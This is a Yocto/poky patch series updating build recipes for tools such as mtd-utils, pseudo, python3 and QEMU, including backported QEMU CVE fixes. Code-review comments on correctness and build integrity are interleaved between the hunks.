typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template <typename _class, typename _data> +@@ -161,9 +161,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template <typename _class, typename _data> +@@ -175,9 +175,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template <typename _class, typename _data> +@@ -189,7 +189,7 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + }; + + template <typename _class, typename _data> +@@ -220,7 +220,7 @@ namespace Elf + typedef typename _elfdef<_class>::Phdr Phdr; + + public: +- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc); ++ segment_real (Phdr *, uint8_t *) throw (); + }; + + template <typename _class, typename _data> +@@ -232,7 +232,7 @@ namespace Elf + public: + dynamic_data (Dyn *) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); + }; + + template <typename _class, typename _data> +@@ -244,8 +244,8 @@ namespace Elf + public: + symbol_data (Sym *) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); +- virtual void update_version (const file &, 
uint16_t) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); ++ virtual void update_version (const file &, uint16_t) throw (); + }; + + template <typename _class, typename _data> +@@ -257,7 +257,7 @@ namespace Elf + + version_definition_data (Verdef *) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); + }; + + template <typename _class, typename _data> +@@ -269,7 +269,7 @@ namespace Elf + + version_requirement_data (Verneed *) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); + }; + + template <typename _class, typename _data> +@@ -280,7 +280,7 @@ namespace Elf + + version_requirement_entry_data (Vernaux *, const version_requirement &) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); + }; + } + +-- +2.11.0 + diff --git a/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb index 1784af1f4c..07142e57e0 100644 --- a/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb +++ b/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb @@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/ file://avoid-failure-on-symbol-provided-by-application.patch \ file://show-GNU-unique-symbols-as-provided-symbols.patch \ file://fix_cross_compile.patch \ + file://remove-deprecated-exception-specification-cpp17.patch \ " SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc" 
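Review bot: Replacing `throw (std::bad_alloc, std::runtime_error)` and the other dynamic exception specifications with `throw ()` changes the contract instead of only dropping a deprecated spelling: `throw ()` promises that nothing escapes, so an exception leaving one of these functions now ends the process through std::terminate rather than reaching the caller. That affects visible code such as `get_section`, whose body `return *sections.at(i);` can throw std::out_of_range, and `file::open`, which was declared to throw std::runtime_error; a malformed ELF input would presumably abort the tool instead of producing a handled error. The behaviour-preserving conversion is to remove the specification from every function that previously listed exception types, e.g. `static file *open(const char *filename);` and `const section &get_section(unsigned int i) const { return *sections.at(i); };`, keeping `throw ()` only where it was already present. The same applies across all three files in this patch (elf.cpp, elf.hpp, elf_data.hpp).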
diff --git a/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch b/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch deleted file mode 100644 index d43f7e1a7a..0000000000 --- a/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch +++ /dev/null 
@@ -1,62 +0,0 @@ -From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001 -From: Barry Grussling <barry@grussling.com> -Date: Sun, 12 Jan 2020 12:33:32 -0800 -Subject: [PATCH] mtd-utils: Fix return value of ubiformat -Organization: O.S. Systems Software LTDA. - -This changeset fixes a feature regression in ubiformat. Older versions of -ubiformat, when invoked with a flash-image, would return 0 in the case no error -was encountered. Upon upgrading to latest, it was discovered that ubiformat -returned 255 even without encountering an error condition. - -This changeset corrects the above issue and causes ubiformat, when given an -image file, to return 0 when no errors are detected. - -Tested by running through my loading scripts and verifying ubiformat returned -0. - -Upstream-Status: Backport [2.1.2] - -Signed-off-by: Barry Grussling <barry@grussling.com> -Signed-off-by: David Oberhollenzer <david.oberhollenzer@sigma-star.at> -Signed-off-by: Otavio Salvador <otavio@ossystems.com.br> ---- - ubi-utils/ubiformat.c | 7 +++++-- - 1 file changed, 5 insertions(+), 2 deletions(-) - -diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c -index a90627c..5377b12 100644 ---- a/ubi-utils/ubiformat.c -+++ b/ubi-utils/ubiformat.c -@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd, - struct ubi_vtbl_record *vtbl; - int eb1 = -1, eb2 = -1; - long long ec1 = -1, ec2 = -1; -+ int ret = -1; - - write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1; - write_size /= mtd->subpage_size; -@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd, - if (!args.quiet && !args.verbose) - printf("\n"); - -- if (novtbl) -+ if (novtbl) { -+ ret = 0; - goto out_free; -+ } - - if (eb1 == -1 || eb2 == -1) { - errmsg("no eraseblocks for volume table"); -@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd, - - out_free: - free(hdr); -- return -1; -+ return ret; - } - - int main(int argc, 
char * const argv[]) --- -2.27.0 - diff --git a/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb b/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb index 9c05dc03dc..fa42770ee4 100644 --- a/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb +++ b/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb @@ -11,18 +11,15 @@ inherit autotools pkgconfig update-alternatives DEPENDS = "zlib e2fsprogs util-linux" RDEPENDS_mtd-utils-tests += "bash" -PV = "2.1.1" +PV = "2.1.3" -SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a" -SRC_URI = "git://git.infradead.org/mtd-utils.git \ +SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5" +SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \ file://add-exclusion-to-mkfs-jffs2-git-2.patch \ - file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \ -" + " S = "${WORKDIR}/git/" -EXTRA_OECONF += "--enable-install-tests" - # xattr support creates an additional compile-time dependency on acl because # the sys/acl.h header is needed. libacl is not needed and thus enabling xattr # regardless whether acl is enabled or disabled in the distro should be okay. diff --git a/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb b/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb index c02b876c02..ae3f3f1ea8 100644 --- a/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb +++ b/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb @@ -8,7 +8,7 @@ DEPENDS = "re2c-native ninja-native" SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f" -SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release" +SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https" UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb b/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb index b64eaf3c21..2bf3108f88 100644 --- a/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb +++ b/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb 
@@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/NixOS/patchelf" LICENSE = "GPLv3" -SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \ +SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \ file://handle-read-only-files.patch \ file://fix-adjusting-startPage.patch \ file://fix-phdrs.patch \ diff --git a/poky/meta/recipes-devtools/pseudo/files/build-oldlibc b/poky/meta/recipes-devtools/pseudo/files/build-oldlibc new file mode 100755 index 0000000000..85c438de4e --- /dev/null +++ b/poky/meta/recipes-devtools/pseudo/files/build-oldlibc @@ -0,0 +1,20 @@ +#!/bin/sh +# +# Script to re-generate pseudo-prebuilt-2.33.tar.xz +# +# Copyright (C) 2021 Richard Purdie +# +# SPDX-License-Identifier: GPL-2.0-only +# + +for i in x86_64 aarch64 i686; do + if [ ! -e $i-nativesdk-libc.tar.xz ]; then + wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz + fi + tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\* + cd $i-linux/lib + ln -s libdl.so.2 libdl.so + ln -s libpthread.so.0 libpthread.so + cd ../.. +done +tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux
\ No newline at end of file diff --git a/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch new file mode 100644 index 0000000000..c453b5f735 --- /dev/null +++ b/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch 
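Review bot: In `build-oldlibc`, the `wget` line fetches the uninative libc tarballs over plain `http://` and the script unpacks them with no integrity check, although the libraries it extracts end up in `pseudo-prebuilt-2.33.tar.xz`, which the pseudo build later puts on its link path via `-Lprebuilt/...`. Fetching with `wget https://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz` (assuming the host serves HTTPS) and comparing each download against a recorded SHA-256 before `tar -xf` would let the blob be regenerated from verified inputs. The `[ ! -e ... ]` test also reuses any same-named file already in the directory without checking it. The script has no `set -e`, so a failed download or `cd $i-linux/lib` lets the `ln -s` and `cd ../..` lines run in the wrong directory; `set -eu` after the header comment would stop that.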
@@ -0,0 +1,57 @@ +If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a +binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread +and dl are merged into libc itself. + +We need to use the older form of linking so use glibc binaries from an older release +to force this. We only use minimal symbols from these anyway. + +pthread_atfork is problematic, particularly on arm so use the internal glibc routine +it maps too. This was always present in the main libc from 2.3.2 onwards. + +Yes this is horrible. Better solutions welcome. + +There is more info in the bug: [YOCTO #14521] + +Upstream-Status: Inappropriate [this patch is native and nativesdk] +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> + +Tweak library search order, make prebuilt lib ahead of recipe lib +Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> +--- + Makefile.in | 2 +- + pseudo_wrappers.c | 5 ++++- + 2 files changed, 5 insertions(+), 2 deletions(-) + +diff --git a/Makefile.in b/Makefile.in +--- a/Makefile.in ++++ b/Makefile.in +@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN) + libpseudo: $(LIBPSEUDO) + + $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB) +- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \ ++ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \ + pseudo_client.o pseudo_ipc.o \ + $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS) + +diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c +--- a/pseudo_wrappers.c ++++ b/pseudo_wrappers.c +@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void) + pseudo_mutex_holder = 0; + } + ++extern void *__dso_handle; ++extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *); ++ + static void + _libpseudo_init(void) { + if (!_libpseudo_initted) +- pthread_atfork(NULL, NULL, libpseudo_atfork_child); ++ 
__register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle); + + pseudo_getlock(); + pseudo_antimagic(); +-- +2.27.0 + diff --git a/poky/meta/recipes-devtools/pseudo/pseudo_git.bb b/poky/meta/recipes-devtools/pseudo/pseudo_git.bb index 0ba460f3e6..1a5d230c69 100644 --- a/poky/meta/recipes-devtools/pseudo/pseudo_git.bb +++ b/poky/meta/recipes-devtools/pseudo/pseudo_git.bb @@ -5,8 +5,15 @@ SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \ file://fallback-passwd \ file://fallback-group \ " +SRC_URI:append:class-native = " \ + http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \ + file://older-glibc-symbols.patch" +SRC_URI:append:class-nativesdk = " \ + http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \ + file://older-glibc-symbols.patch" +SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa" -SRCREV = "b988b0a6b8afd8d459bc9a2528e834f63a3d59b2" +SRCREV = "d34f2f6cedccf8488730001bcbde6bb7499f8814" S = "${WORKDIR}/git" PV = "1.9.0+git${SRCPV}" diff --git a/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb b/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb index 698016ba4c..b73310c808 100644 --- a/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb +++ b/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb @@ -14,6 +14,11 @@ inherit pypi setuptools3 SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59" SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5" -RDEPENDS_${PN} += "file" +DEPENDS_append_class-native = " file-replacement-native" + +RDEPENDS_${PN} += "file \ + ${PYTHON_PN}-ctypes \ + ${PYTHON_PN}-io \ + ${PYTHON_PN}-shell" BBCLASSEXTEND = "native" 
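Review bot: In the `pseudo_wrappers.c` part of `older-glibc-symbols.patch`, `__dso_handle` is declared as a plain `extern void *__dso_handle;`, so the `&__dso_handle == NULL` test in the `__register_atfork` call can never be true and a compiler is free to fold it away. If the NULL fallback is meant to cover objects where the symbol is absent, the declaration needs to be weak, e.g. `extern void *__dso_handle __attribute__((__weak__));`; otherwise the call can pass `__dso_handle` directly. The call also relies on `__register_atfork`, a glibc-internal entry point, so a short comment at the declaration repeating the description's statement that it has been in the main libc since 2.3.2 would help the next maintainer. `_libpseudo_init` continues outside the inner hunk.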
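Review bot: The two added `SRC_URI:append` blocks in `pseudo_git.bb` pull a tarball of prebuilt shared libraries into the native and nativesdk builds, but the recipe says nothing about where that binary comes from. The `SRC_URI[prebuilt.sha256sum]` pin covers the plain-HTTP fetch; what is missing is provenance, so a comment above the first block such as `# pseudo-prebuilt-2.33.tar.xz is generated by files/build-oldlibc; see older-glibc-symbols.patch for why it is needed` would let a reviewer trace the blob. The class-native and class-nativesdk blocks are identical and could share one variable, so the URL and patch list live in a single place.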
diff --git a/poky/meta/recipes-devtools/python/python3/makerace.patch b/poky/meta/recipes-devtools/python/python3/makerace.patch new file mode 100644 index 0000000000..8971f28b8e --- /dev/null +++ b/poky/meta/recipes-devtools/python/python3/makerace.patch @@ -0,0 +1,23 @@ +libainstall installs python-config.py but the .pyc cache files are generated +by the libinstall target. This means some builds may not generate the pyc files +for python-config.py depending on the order things happen in. This means builds +are not always reproducible. + +Add a dependency to avoid the race. + +Upstream-Status: Pending +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> + +Index: Python-3.8.11/Makefile.pre.in +=================================================================== +--- Python-3.8.11.orig/Makefile.pre.in ++++ Python-3.8.11/Makefile.pre.in +@@ -1415,7 +1415,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter + unittest unittest/test unittest/test/testmock \ + venv venv/scripts venv/scripts/common venv/scripts/posix \ + curses pydoc_data +-libinstall: build_all $(srcdir)/Modules/xxmodule.c ++libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall + @for i in $(SCRIPTDIR) $(LIBDEST); \ + do \ + if test ! -d $(DESTDIR)$$i; then \ diff --git a/poky/meta/recipes-devtools/python/python3_3.8.11.bb b/poky/meta/recipes-devtools/python/python3_3.8.12.bb index f549bb2205..cfcc91b396 100644 --- a/poky/meta/recipes-devtools/python/python3_3.8.11.bb +++ b/poky/meta/recipes-devtools/python/python3_3.8.12.bb @@ -33,6 +33,7 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \ file://0001-configure.ac-fix-LIBPL.patch \ file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \ file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \ + file://makerace.patch \ " SRC_URI_append_class-native = " \ 
@@ -41,8 +42,8 @@ SRC_URI_append_class-native = " \ file://0001-Don-t-search-system-for-headers-libraries.patch \ " -SRC_URI[md5sum] = "5840ba601128f48fee4e7c98fbdac65d" -SRC_URI[sha256sum] = "fb1a1114ebfe9e97199603c6083e20b236a0e007a2c51f29283ffb50c1420fb2" +SRC_URI[md5sum] = "9dd8f82e586b776383c82e27923f8795" +SRC_URI[sha256sum] = "b1d3a76420375343b5e8a22fceb1ac65b77193e9ed27146524f0a9db058728ea" # exclude pre-releases for both python 2.x and 3.x UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar" diff --git a/poky/meta/recipes-devtools/qemu/qemu.inc b/poky/meta/recipes-devtools/qemu/qemu.inc index e25c2524aa..ef9bc3f64a 100644 --- a/poky/meta/recipes-devtools/qemu/qemu.inc +++ b/poky/meta/recipes-devtools/qemu/qemu.inc 
@@ -35,27 +35,64 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \ file://CVE-2020-7039-2.patch \ file://CVE-2020-7039-3.patch \ file://0001-Add-enable-disable-udev.patch \ - file://CVE-2020-7211.patch \ - file://0001-qemu-Do-not-include-file-if-not-exists.patch \ + file://CVE-2020-7211.patch \ + file://0001-qemu-Do-not-include-file-if-not-exists.patch \ file://CVE-2020-11102.patch \ - file://CVE-2020-11869.patch \ - file://CVE-2020-13361.patch \ - file://CVE-2020-10761.patch \ - file://CVE-2020-10702.patch \ - file://CVE-2020-13659.patch \ - file://CVE-2020-13800.patch \ - file://CVE-2020-13362.patch \ - file://CVE-2020-15863.patch \ - file://CVE-2020-14364.patch \ - file://CVE-2020-14415.patch \ - file://CVE-2020-16092.patch \ - file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \ - file://CVE-2019-20175.patch \ - file://CVE-2020-24352.patch \ - file://CVE-2020-25723.patch \ - file://CVE-2021-20203.patch \ - file://CVE-2021-3392.patch \ - " + file://CVE-2020-11869.patch \ + file://CVE-2020-13361.patch \ + file://CVE-2020-10761.patch \ + file://CVE-2020-10702.patch \ + file://CVE-2020-13659.patch \ + file://CVE-2020-13800.patch \ + file://CVE-2020-13362.patch \ + file://CVE-2020-15863.patch \ + file://CVE-2020-14364.patch \ + file://CVE-2020-14415.patch \ + file://CVE-2020-16092.patch \ + file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \ + file://CVE-2019-20175.patch \ + file://CVE-2020-24352.patch \ + file://CVE-2020-25723.patch \ + file://CVE-2021-20203.patch \ + file://CVE-2021-3392.patch \ + file://CVE-2020-25085.patch \ + file://CVE-2020-25624_1.patch \ + file://CVE-2020-25624_2.patch \ + file://CVE-2020-25625.patch \ + file://CVE-2020-29443.patch \ + file://CVE-2021-20221.patch \ + file://CVE-2021-20181.patch \ + file://CVE-2021-3416_1.patch \ + file://CVE-2021-3416_2.patch \ + file://CVE-2021-3416_3.patch \ + file://CVE-2021-3416_5.patch \ + file://CVE-2021-3416_6.patch \ + file://CVE-2021-3416_7.patch 
\ + file://CVE-2021-3416_8.patch \ + file://CVE-2021-3416_9.patch \ + file://CVE-2021-3416_10.patch \ + file://CVE-2021-20257.patch \ + file://CVE-2021-3544.patch \ + file://CVE-2021-3544_2.patch \ + file://CVE-2021-3544_3.patch \ + file://CVE-2021-3544_4.patch \ + file://CVE-2021-3544_5.patch \ + file://CVE-2021-3545.patch \ + file://CVE-2021-3546.patch \ + file://CVE-2021-3527-1.patch \ + file://CVE-2021-3527-2.patch \ + file://CVE-2021-3582.patch \ + file://CVE-2021-3607.patch \ + file://CVE-2021-3608.patch \ + file://CVE-2020-12829_1.patch \ + file://CVE-2020-12829_2.patch \ + file://CVE-2020-12829_3.patch \ + file://CVE-2020-12829_4.patch \ + file://CVE-2020-12829_5.patch \ + file://CVE-2020-27617.patch \ + file://CVE-2020-28916.patch \ + file://CVE-2021-3682.patch \ + " UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar" SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a" diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch new file mode 100644 index 0000000000..6fee4f640d --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch 
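Review bot: The CVE-2021-3416 series added to `SRC_URI` in `qemu.inc` goes `_1`, `_2`, `_3`, `_5` through `_10`, with no `CVE-2021-3416_4.patch`. If the fourth upstream change was left out on purpose (for example because the code it touches is not in this QEMU version), a comment next to the list saying so would keep the gap from looking like a dropped fix in a later CVE audit; if it was an oversight, the patch should be added. The new entries also mix `_N` and `-N` suffixes (`CVE-2021-3527-1.patch` next to `CVE-2020-25624_1.patch`), which makes the list harder to scan.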
@@ -0,0 +1,164 @@ +From e29da77e5fddf6480e3a0e80b63d703edaec751b Mon Sep 17 00:00:00 2001 +From: BALATON Zoltan <balaton@eik.bme.hu> +Date: Thu, 21 May 2020 21:39:44 +0200 +Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Some places already use qemu_log_mask() to log unimplemented features +or errors but some others have printf() then abort(). Convert these to +qemu_log_mask() and avoid aborting to prevent guests to easily cause +denial of service. + +Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2020-12829 dep#1 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------ + 1 file changed, 27 insertions(+), 30 deletions(-) + +diff --git a/hw/display/sm501.c b/hw/display/sm501.c +index acc692531a..bd3ccfe311 100644 +--- a/hw/display/sm501.c ++++ b/hw/display/sm501.c +@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s) + int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt); + + if (addressing != 0x0) { +- printf("%s: only XY addressing is supported.\n", __func__); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n"); ++ return; + } + + if (rop_mode == 0) { +@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s) + + if ((s->twoD_source_base & 0x08000000) || + (s->twoD_destination_base & 0x08000000)) { +- printf("%s: only local memory is supported.\n", __func__); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n"); ++ return; + } + + switch (operation) { +@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s) + break; + + default: +- 
printf("non-implemented SM501 2D operation. %d\n", operation); +- abort(); +- break; ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n", ++ operation); ++ return; + } + + if (dst_base >= get_fb_addr(s, crt) && +@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 system config : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config" ++ "register read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr, + break; + case SM501_ENDIAN_CONTROL: + if (value & 0x00000001) { +- printf("sm501 system config : big endian mode not implemented.\n"); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not" ++ " implemented.\n"); + } + break; + + default: +- printf("sm501 system config : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (uint32_t)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config" ++ "register write. addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 disp ctrl : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr, + break; + + default: +- printf("sm501 disp ctrl : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (unsigned)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "write. 
addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr, + ret = 0; /* Should return interrupt status */ + break; + default: +- printf("sm501 disp ctrl : not implemented register read." +- " addr=%x\n", (int)addr); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register " ++ "read. addr=%" HWADDR_PRIx "\n", addr); + } + + return ret; +@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr, + /* ignored, writing 0 should clear interrupt status */ + break; + default: +- printf("sm501 2d engine : not implemented register write." +- " addr=%x, val=%x\n", (int)addr, (unsigned)value); +- abort(); ++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register " ++ "write. addr=%" HWADDR_PRIx ++ ", val=%" PRIx64 "\n", addr, value); + } + } + +@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque) + draw_line = draw_line32_funcs[dst_depth_index]; + break; + default: +- printf("sm501 update display : invalid control register value.\n"); +- abort(); +- break; ++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display" ++ "invalid control register value.\n"); ++ return; + } + + /* set up to draw hardware cursor */ +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch new file mode 100644 index 0000000000..e7258a43d3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch 
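Review bot: Several of the new `qemu_log_mask()` messages in `CVE-2020-12829_1.patch` join adjacent string literals without a separating space, so they log as `system configregister read`, `system configregister write` and `update displayinvalid control register value`; the first literal of each pair should end with a space, e.g. `"sm501: not implemented system config "`. These messages are what an operator searches for when a guest touches unimplemented registers, so the text matters. With `abort()` gone, the `default:` arms of the read handlers now fall through to `return ret;`, and `ret` is initialised outside the hunks, so it is worth confirming it starts at a defined value. As this is a backport, the string fix is best sent upstream rather than edited locally.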
